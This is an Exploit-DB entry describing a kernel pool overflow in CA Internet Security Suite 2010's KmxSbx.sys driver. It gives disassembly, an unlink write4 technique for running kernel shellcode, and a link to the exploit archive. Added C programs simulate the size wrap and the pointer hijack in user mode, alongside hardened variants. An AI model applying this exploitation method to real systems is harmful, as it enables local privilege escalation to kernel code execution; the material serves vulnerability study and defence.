exploit-db-mirror/exploits/windows/local/15624.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25
/*
# Exploit Title: CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool Overflow 0-day Exploit
# Date: 2010-11-28
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://shop.ca.com/ca/products/internetsecurity/internetsecurity_suite.asp
# Version: up to date, KmxSbx.sys version 6.2.0.22
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/
1.Description:
The KmxSbx.sys kernel driver distributed with CA Internet Security Suite 2010
contains a pool corruption vulnerability in the handling of IOCTL 0x88000080.
The driver computes the size of a pool allocation from the length of an
attacker-supplied UNICODE string (string length + 0x50 bytes) but keeps only
the low 16 bits of that size before calling ExAllocatePool, and then copies the
whole string into the buffer. A string long enough to wrap the 16-bit size
therefore overflows an undersized pool allocation.
Exploitation of this issue allows an attacker to execute arbitrary code
within the kernel.
An attacker would need local access to a vulnerable computer to exploit
this vulnerability.
Affected application: CA Internet Security Suite 2010.
Affected file: KmxSbx.sys version 6.2.0.22.
2.Vulnerability details:
[..]
.text:00016330 mov cx, [eax]             ; eax points to attacker controlled data
.text:00016333 inc eax
.text:00016334 inc eax
.text:00016335 test cx, cx
.text:00016338 jnz short loc_16330
.text:0001633A sub eax, edx
.text:0001633C sar eax, 1
.text:0001633E lea eax, [eax+eax+50h]    ; size of UNICODE string + 0x50 bytes
.text:00016342 movzx edi, ax             ; integer wrap here!
.text:00016345
.text:00016345 loc_16345:                ; CODE XREF: sub_162D8+53j
.text:00016345 movzx eax, di
.text:00016348 push ebx
.text:00016349 xor ebx, ebx
.text:0001634B cmp eax, ebx
.text:0001634D jz short loc_16359
.text:0001634F push eax                  ; NumberOfBytes
.text:00016350 push ebx                  ; PoolType
.text:00016351 call ds:ExAllocatePool    ; Miscalculated Pool!!!
.text:00016357 mov ebx, eax
[..]
.text:000163A6 movzx esi, word ptr [edx]
.text:000163A9 mov [eax+edx], si         ; Pool overflow here!
.text:000163AD inc edx
.text:000163AE inc edx
.text:000163AF test si, si
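The size calculation above, modelled in user-mode C. This is an added example, not code from the advisory or from KmxSbx.sys: it reproduces the three instructions that matter (sub/sar, lea [eax+eax+50h], movzx edi,ax), derives the string length that makes the 16-bit size wrap to a chosen small value, and copies the way the loop at 000163A6 does into a buffer of the truncated size, watching the bytes past its end as a stand-in for the neighbouring pool chunk. Where the driver places the string inside the 0x50-byte-larger buffer is not in the excerpt, so the model copies from offset 0 (at most 0x50 bytes of slack differ). HDR_BYTES, CANARY_BYTES and every function name are the example's own; a hardened variant that rejects the wrapping length instead of truncating is included for contrast.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HDR_BYTES    0x50u   /* the constant from lea eax, [eax+eax+50h] */
#define CANARY_BYTES 0x40u   /* bytes watched past the buffer: stand-in for the next chunk */

/* Length in 16-bit code units; wchar_t is 32 bits on Linux, so wcslen() would not do. */
static size_t wlen16(const uint16_t *s) {
    size_t n = 0;
    while (s[n]) n++;
    return n;
}

/* Constructed input: len_wchars 'A' characters plus the terminating NUL. */
static uint16_t *make_string(size_t len_wchars) {
    uint16_t *s = malloc((len_wchars + 1) * sizeof *s);
    if (!s) return NULL;
    for (size_t i = 0; i < len_wchars; i++) s[i] = 0x41;
    s[len_wchars] = 0;
    return s;
}

/* NumberOfBytes as the driver computes it: (chars incl. NUL) * 2 + 0x50, then movzx edi, ax. */
uint16_t vuln_pool_size(const uint16_t *s) {
    uint32_t bytes = (uint32_t)((wlen16(s) + 1) * 2);  /* sub eax,edx; sar/lea give bytes again */
    uint32_t size  = bytes + HDR_BYTES;                 /* lea eax, [eax+eax+50h] */
    return (uint16_t)size;                              /* movzx edi, ax: high 16 bits dropped */
}

/* Hardened form: keep the full width and refuse anything a 16-bit field cannot hold. */
int safe_pool_size(const uint16_t *s, uint32_t *out) {
    size_t bytes = (wlen16(s) + 1) * 2;
    if (bytes > 0xFFFFu - HDR_BYTES) return 0;          /* would wrap: reject, do not truncate */
    *out = (uint32_t)(bytes + HDR_BYTES);
    return 1;
}

/* Shortest string (chars, NUL excluded) whose size wraps to exactly `target` (target even). */
size_t wrapping_len(uint16_t target) {
    return ((0x10000u + target - HDR_BYTES) / 2) - 1;
}

uint16_t vuln_size_for_len(size_t len_wchars) {
    uint16_t *s = make_string(len_wchars);
    if (!s) return 0;
    uint16_t r = vuln_pool_size(s);
    free(s);
    return r;
}

int safe_accepts_len(size_t len_wchars) {
    uint16_t *s = make_string(len_wchars);
    if (!s) return 0;
    uint32_t sz;
    int ok = safe_pool_size(s, &sz);
    free(s);
    return ok;
}

/* Allocate what the driver would and copy as the loop at 000163A6 does.
 * Returns how many of the CANARY_BYTES past the buffer were overwritten
 * (0 = no overflow).  The copy stops at the edge of the watched window so the
 * model stays memory safe; the driver keeps writing until it reaches the NUL. */
size_t demo_overflow(size_t len_wchars) {
    uint16_t *str = make_string(len_wchars);
    if (!str) return 0;
    uint16_t cap = vuln_pool_size(str);
    if (cap == 0) { free(str); return 0; }      /* cmp eax,ebx / jz: no allocation at all */
    size_t window = (size_t)cap + CANARY_BYTES;
    uint8_t *pool = malloc(window);
    if (!pool) { free(str); return 0; }
    memset(pool, 0xCC, window);                 /* 0xCC = "untouched neighbour" */

    size_t off = 0;
    for (size_t i = 0; off + 2 <= window; i++) {
        memcpy(pool + off, &str[i], 2);         /* mov [eax+edx], si */
        off += 2;                               /* inc edx; inc edx */
        if (str[i] == 0) break;                 /* test si, si / jnz */
    }
    size_t clobbered = 0;
    for (size_t i = cap; i < window; i++)
        if (pool[i] != 0xCC) clobbered++;
    free(pool);
    free(str);
    return clobbered;
}

int main(void) {
    size_t evil = wrapping_len(0x10);
    printf("4 chars      -> pool size 0x%x, overflow bytes %zu\n",
           vuln_size_for_len(4), demo_overflow(4));
    printf("0x%zx chars -> pool size 0x%x, overflow bytes %zu, safe version accepts: %d\n",
           evil, vuln_size_for_len(evil), demo_overflow(evil), safe_accepts_len(evil));
    return 0;
}
```

Two details the listing itself implies: a length that wraps the size to exactly 0 never reaches ExAllocatePool (cmp eax,ebx / jz at 0001634B), so the useful lengths are those whose full size is 0x10000 plus a small even number; and because the loop copies until the NUL, the amount written past the truncated buffer is the whole 64 KiB string, not just a few bytes, which is what makes the fake chunk header of the exploitation section reachable.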
3.Exploitation:
1. To exploit this vulnerability we allocate shellcode at a known address and
use the overflow to craft a fake chunk header for the adjacent pool block, so
that unlinking that block yields a write4 primitive: the unlink stores Flink at
[Blink] and Blink at [Flink+4].
2. To invoke our shellcode we set Flink and Blink in the fake header to the
address of our r0 shellcode and the address of some pointer in kernel space.
When the unlink happens, the pointer in kernel space is overwritten with the
shellcode address, and the next use of that pointer forces execution with
kernel privileges (cpl==0).
3. Pool repair.
Exploit code is in the CAInternetSecuritySuite2010.zip file.
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15624.zip (CAInternetSecuritySuite2010.zip)
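Step 2 above, the unlink write4, modelled in user-mode C. This is an added example and not the exploit from CAInternetSecuritySuite2010.zip: a free pool block's header is followed by a LIST_ENTRY, and the model keeps only that LIST_ENTRY and the two stores the removal performs (Flink->Blink = Blink, Blink->Flink = Flink). The payload struct, g_kernel_dispatch (standing in for "some pointer in kernel space"), ring0_shellcode and the helper names are the example's own. The collateral store lands at Flink+sizeof(void*), i.e. inside the shellcode buffer, which is why the real shellcode has to jump over its first bytes; the model reserves a field for it. A checked variant shows the safe-unlink test that defeats the technique; the advisory's technique working on XP SP3 implies the pool there performs no such check.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct list_entry { struct list_entry *Flink, *Blink; } LIST_ENTRY;

/* Attacker memory standing in for the ring-0 shellcode buffer.  The unlink's
 * first store lands at Flink + sizeof(void *), so real shellcode opens with a
 * short jump over that slot; here the slot is a field nothing reads. */
struct payload {
    void *jmp_over;              /* offset 0: untouched by the unlink */
    void *clobbered_by_unlink;   /* offset sizeof(void *): receives Blink */
    void (*body)(void);          /* what runs once control arrives */
};

/* Pointer in "kernel space" that the kernel later calls through; the second
 * store of the unlink lands at Blink + 0, i.e. directly on this variable. */
static struct payload *g_kernel_dispatch;
static int g_shellcode_ran;
static void ring0_shellcode(void) { g_shellcode_ran = 1; }

/* Raw pointer-sized load/store, so forged Flink/Blink values may point at
 * objects of any type without aliasing undefined behaviour in the model. */
static LIST_ENTRY *load_ptr(const void *at) { LIST_ENTRY *p; memcpy(&p, at, sizeof p); return p; }
static void store_ptr(void *at, LIST_ENTRY *v) { memcpy(at, &v, sizeof v); }

/* The two stores a free-list removal performs:
 *     Flink->Blink = Blink;     Blink->Flink = Flink;
 * With attacker-chosen Flink/Blink that is "write Flink to [Blink]" plus the
 * collateral "write Blink to [Flink+ptr]": the write4 primitive. */
static void unlink_entry(LIST_ENTRY *e) {
    LIST_ENTRY *f = e->Flink, *b = e->Blink;
    store_ptr((char *)f + sizeof(void *), b);
    store_ptr(b, f);
}

/* The same removal behind a safe-unlink check: a forged entry whose
 * neighbours do not point back at it is rejected and nothing is written. */
static int unlink_entry_checked(LIST_ENTRY *e) {
    if (load_ptr((char *)e->Flink + sizeof(void *)) != e || load_ptr(e->Blink) != e)
        return 0;
    unlink_entry(e);
    return 1;
}

static struct payload g_sc;   /* our "shellcode allocation" */

static LIST_ENTRY forged_entry(void) {
    g_kernel_dispatch = NULL;
    g_shellcode_ran = 0;
    memset(&g_sc, 0, sizeof g_sc);
    g_sc.body = ring0_shellcode;
    /* Flink = address of the shellcode, Blink = address of the kernel pointer.
     * In the real exploit these sit in the fake chunk header the overflow wrote. */
    LIST_ENTRY e = { (LIST_ENTRY *)&g_sc, (LIST_ENTRY *)&g_kernel_dispatch };
    return e;
}

/* Bitmask: 1 = kernel pointer now points at the payload, 2 = collateral store
 * landed in the reserved slot, 4 = the payload ran when the kernel used the pointer. */
int run_unlink_hijack(void) {
    LIST_ENTRY fake = forged_entry();
    unlink_entry(&fake);                                 /* "when unlinking happens ..." */
    int r = 0;
    if (g_kernel_dispatch == &g_sc) r |= 1;
    if (g_sc.clobbered_by_unlink == (void *)&g_kernel_dispatch) r |= 2;
    if (g_kernel_dispatch) g_kernel_dispatch->body();   /* kernel calls through the pointer */
    if (g_shellcode_ran) r |= 4;
    return r;
}

/* 1 = the forged entry was rejected and the kernel pointer is still intact. */
int run_unlink_hijack_checked(void) {
    LIST_ENTRY fake = forged_entry();
    int accepted = unlink_entry_checked(&fake);
    return !accepted && g_kernel_dispatch == NULL && g_sc.clobbered_by_unlink == NULL;
}

int main(void) {
    printf("unchecked unlink: result mask %d (7 = pointer hijacked, slot clobbered, shellcode ran)\n",
           run_unlink_hijack());
    printf("checked unlink:   attack rejected = %d\n", run_unlink_hijack_checked());
    return 0;
}
```

The model says nothing about step 3 (pool repair): after the stores the pool's free list still contains the forged entry and the overwritten neighbour, so a real exploit has to restore sane headers before the allocator walks the list again, or the payload runs and the machine bugchecks shortly afterwards.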